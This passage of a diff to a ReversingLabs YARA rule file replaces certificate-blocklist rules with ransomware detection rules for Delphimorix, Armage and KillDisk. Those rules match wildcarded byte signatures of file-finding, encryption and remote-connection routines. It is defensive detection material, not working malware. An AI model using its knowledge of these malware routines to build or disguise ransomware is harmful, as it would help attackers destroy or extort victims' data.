+            ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 07 ?? 0F 85 ?? ?? ?? ?? F6 47 ?? ?? 0F 85 ?? ??
+            ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 84 C0 75 ??
+            6A ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75
+            ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 84 C0 0F 85 ?? ?? ?? ?? 83
+            FB ?? 74 ?? 53 E8 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ??
+            ?? ?? 33 F6 46 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45
+            ?? 8D 57 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F
+            84 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 07 ?? 0F
+            84 ?? ?? ?? ?? F6 47 ?? ?? 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 75
+            ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 84 C0 75
+            ?? 6A ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 75 ?? 68
+            ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? F7 D8 1B C0
+            F7 D8 84 C0 0F 85 ?? ?? ?? ?? 83 FB ?? 74 ?? 53 E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? F7 D8 1B DB F7 DB 84 DB
+            75 ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$decrypt_payload_script = {
+            FF 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF
+            75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75
+            ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
+            ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 8B C3 BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? FF 33 FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF
+            75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ??
+            ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF
+            75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ??
+            ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D
+            45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALEX & CO PTY LIMITED" and pe.signatures [ i ] . serial == "67:51:29:bb:17:4a:5b:05:e3:30:cc:09:f8:bb:d7:0a" and 1565568000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $find_files and $decrypt_payload_script and ( all of ( $remote_connection_* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_De13Fe2Dbb8F890287E1780Aff6Ffd22 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Delphimorix : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Delphimorix ransomware."
 		author = "ReversingLabs"
-		id = "d2b15920-76ae-54e4-988c-278a3622ec52"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "1f964601-9819-5597-ba6e-db3a30e3aa5a"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3488-L3504"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Delphimorix.yara#L1-L67"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ebd983bcfa1e5d54af9d9e07d80d05f4752040eab92e63cd986db789fa07026f"
+		logic_hash = "6d401d488d57b2d75e93a1dfd47ece687a5791d1f0a52768300f4af8a8787212"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Delphimorix"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            55 8B EC 83 C4 ?? 53 56 57 33 D2 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55
+            68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 6A ?? 8B
+            4D ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 68 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ??
+            ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B C3
+            8B 10 FF 12 52 50 B9 ?? ?? ?? ?? 8B D3 8B C6 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B
+            C6 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8
+            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 59 59 5D C3
+        }
+		$find_files_p1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ??
+            ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B D9 89 55 ?? 89 45 ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 80 7C 02
+            ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 4A 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ??
+            ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 8B D0 83 CA ?? 3B D0 75 ?? 80 FB ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85
+        }
+		$find_files_p2 = {
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B
+            C6 83 C8 ?? 3B C6 75 ?? 80 FB ?? 75 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? FF 75 ?? 68 ?? ?? ??
+            ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? EB ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LAST TIME PTY LTD" and pe.signatures [ i ] . serial == "de:13:fe:2d:bb:8f:89:02:87:e1:78:0a:ff:6f:fd:22" and 1566259200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Da000D18949C247D4Ddfc2585Cc8Bd0F : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Armage : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Armage ransomware."
 		author = "ReversingLabs"
-		id = "3e939b73-abe4-5941-93ab-18bcde854aaf"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "94cf639b-7d9e-51ca-b547-e0d591581df2"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3506-L3524"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Armage.yara#L1-L128"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3453f13e633a2c233f78d0389c655bb5304e567407b3e0c5c47e5e7127c345ca"
+		logic_hash = "aa8ddcbb0fdcad15e603e000db1d4f86eae7d42efce1c1d21dc3dd57ee9f4319"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Armage"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 89 E5 53 8D 5D ?? 81 EC ?? ?? ?? ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? 8D 5D
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 65 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 45
+            ?? 8D 50 ?? 8D 48 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 40 ?? ?? 89 50 ?? 89
+            95 ?? ?? ?? ?? 8D 50 ?? 89 50 ?? 89 95 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 5D ?? 83 EC ?? 89 5D ??
+            8B 41 ?? 8B 51 ?? 8D 4D ?? 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 45 ?? 8D 5D ?? 83 EC ?? 89 5C 24 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 45 ?? 8D 5D ?? 39 D8 74 ?? 89 04 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 89 42 ?? 8B 55 ?? 89 4C 24 ?? 89 04 24 29 CA 89 54 24
+            ?? E8 ?? ?? ?? ?? 8B 55 ?? 89 42 ?? 8B 42 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 55 ?? 89 42
+            ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ??
+            8B 42 ?? 89 04 24 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 8D ??
+            ?? ?? ?? 89 4C 24 ?? 89 85 ?? ?? ?? ?? 89 44 24 ?? 8B 55 ?? 8B 42 ?? 89 04 24 E8 ??
+            ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 4C 24 ?? 89 8D ?? ?? ?? ?? 89 4C 24 ?? 8B 85 ?? ?? ??
+            ?? 89 44 24 ?? 8B 55 ?? 8B 42 ?? 89 04 24 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 44 24
+            ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 5C 24 ?? 8B 8D ??
+            ?? ?? ?? 89 4C 24 ?? 89 85 ?? ?? ?? ?? 89 44 24 ?? 8B 55 ?? 8B 42 ?? 89 04 24 E8 ??
+            ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8D 45 ?? 89 04 24 E8
+        }
+		$encrypt_files_p2 = {
+            8B 55 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? 8D 4A ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D
+            55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ??
+            ?? 8B 40 ?? 8B 80 ?? ?? ?? ?? 85 C0 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 80 78 ?? ?? 74 ?? 0F BE 40 ?? 89 04 24 B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 EC ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
+            8B 45 ?? 85 C0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 5D
+            ?? C9 C3 90 8B 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8B 00 8B 50 ?? B8 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? 8B 8D ??
+            ?? ?? ?? FF D2 83 EC ?? 0F BE C0 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C5 ?? 8B 45 ?? 89
+            85 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83
+            E8 ?? 74 ?? 0F 0B 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85
+            C0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 3B 85 ?? ?? ?? ?? 74 ?? 89 04 24
+            E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 39 85 ?? ?? ?? ?? 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 D0
+            75 ?? EB
+        }
+		$find_files_p1 = {
+            55 89 E5 81 EC ?? ?? ?? ?? 8D 55 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 89 55 ?? 8D 55 ?? 89 65 ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ??
+            8B 4D ?? 83 C0 ?? 8B 51 ?? 89 45 ?? 8D 45 ?? 89 45 ?? 8B 45 ?? 89 55 ?? 8B 00 89 C1
+            89 45 ?? 01 D1 74 ?? 85 C0 75 ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 45 ?? 83 F8 ?? 89 45 ?? 0F 87 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B
+            45 ?? 8D 55 ?? 0F B6 00 88 45 ?? B8 ?? ?? ?? ?? 89 45 ?? C6 04 02 ?? B8 ?? ?? ?? ??
+            2B 45 ?? 83 F8 ?? 0F 86 ?? ?? ?? ?? 8D 4D ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 89 44 24 ?? 8B 45 ?? 89
+            04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 83 EC ?? 89 81 ?? ?? ??
+            ?? 8D 4D ?? 39 CA 74 ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 80 ?? ?? ?? ?? 83 F8
+        }
+		$find_files_p2 = {
+            8B 45 ?? 0F 95 00 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? C9 C2 ?? ?? 8D 76 ?? 8D 45 ?? 8B
+            4D ?? 89 4C 24 ?? 8B 4D ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? E9
+            ?? ?? ?? ?? 8D 45 ?? 8D 4D ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B 55 ?? 83 EC ?? 89 45 ?? 89 55 ?? EB ?? C7 04 24 ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C5 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 85 C0 74 ?? 83 E8
+            ?? 74 ?? 0F 0B 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04
+            24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 66 90 55 89 E5 57 56 8D 45 ?? 53 83 EC ??
+            89 45 ?? 8D 45 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? 89 65 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 5D ?? C6 45 ?? ?? 8B 83 ?? ?? ??
+            ?? 83 F8 ?? 74 ?? 8D 53 ?? 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 EC ?? 85 C0 0F 95 45 ?? 0F B6 45 ?? 8B 75 ?? 88 06 8B 45 ?? 89 04 24 E8 ?? ?? ??
+            ?? 0F B6 45 ?? 8D 65 ?? 5B 5E 5F 5D C3
+        }
+		$enum_resources_p1 = {
+            55 B8 ?? ?? ?? ?? 89 E5 E8 ?? ?? ?? ?? 29 C4 8D 45 ?? 89 8D ?? ?? ?? ?? 89 A5 ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 44 24 ?? 8B 45
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C9 C2 ?? ??
+            8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44
+            24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 85 C0 75 ?? 8D 85 ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 75 ?? EB
+            ?? 8D B4 26 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? F6 40 ?? ?? 0F 85 ?? ?? ?? ?? 83 85 ?? ??
+            ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 0F 83
+        }
+		$enum_resources_p2 = {
+            8B 85 ?? ?? ?? ?? F6 40 ?? ?? 74 ?? 8B 40 ?? 89 C2 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 85 D2 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 74 ?? 89 14 24 E8 ?? ?? ?? ?? 03 85 ?? ??
+            ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 8B 48 ?? 3B 48 ?? 0F 84 ?? ?? ??
+            ?? 85 C9 74 ?? 8D 41 ?? 8B 95 ?? ?? ?? ?? 89 01 8B 85 ?? ?? ?? ?? 01 C2 89 04 24 89
+            54 24 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 8B
+            48 ?? 8B 85 ?? ?? ?? ?? 83 C1 ?? 89 48 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 39 C8
+            0F 84 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? F6 40 ?? ?? 0F 84 ?? ??
+            ?? ?? 89 04 24 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC
+            ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 0C 24 89 44 24 ?? 8B 8D ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? EB
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PORT-SERVIS LTD" and ( pe.signatures [ i ] . serial == "00:da:00:0d:18:94:9c:24:7d:4d:df:c2:58:5c:c8:bd:0f" or pe.signatures [ i ] . serial == "da:00:0d:18:94:9c:24:7d:4d:df:c2:58:5c:c8:bd:0f" ) and 1564444800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $enum_resources_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_06E842D3Ea6249D783D6B55E29C060C7 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Killdisk : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects KillDisk ransomware."
 		author = "ReversingLabs"
-		id = "37829f07-c569-5e46-8b7a-2137c4c801e8"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "bd04ac88-987a-58f0-8f0a-508662b3c930"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3526-L3542"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.KillDisk.yara#L1-L80"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
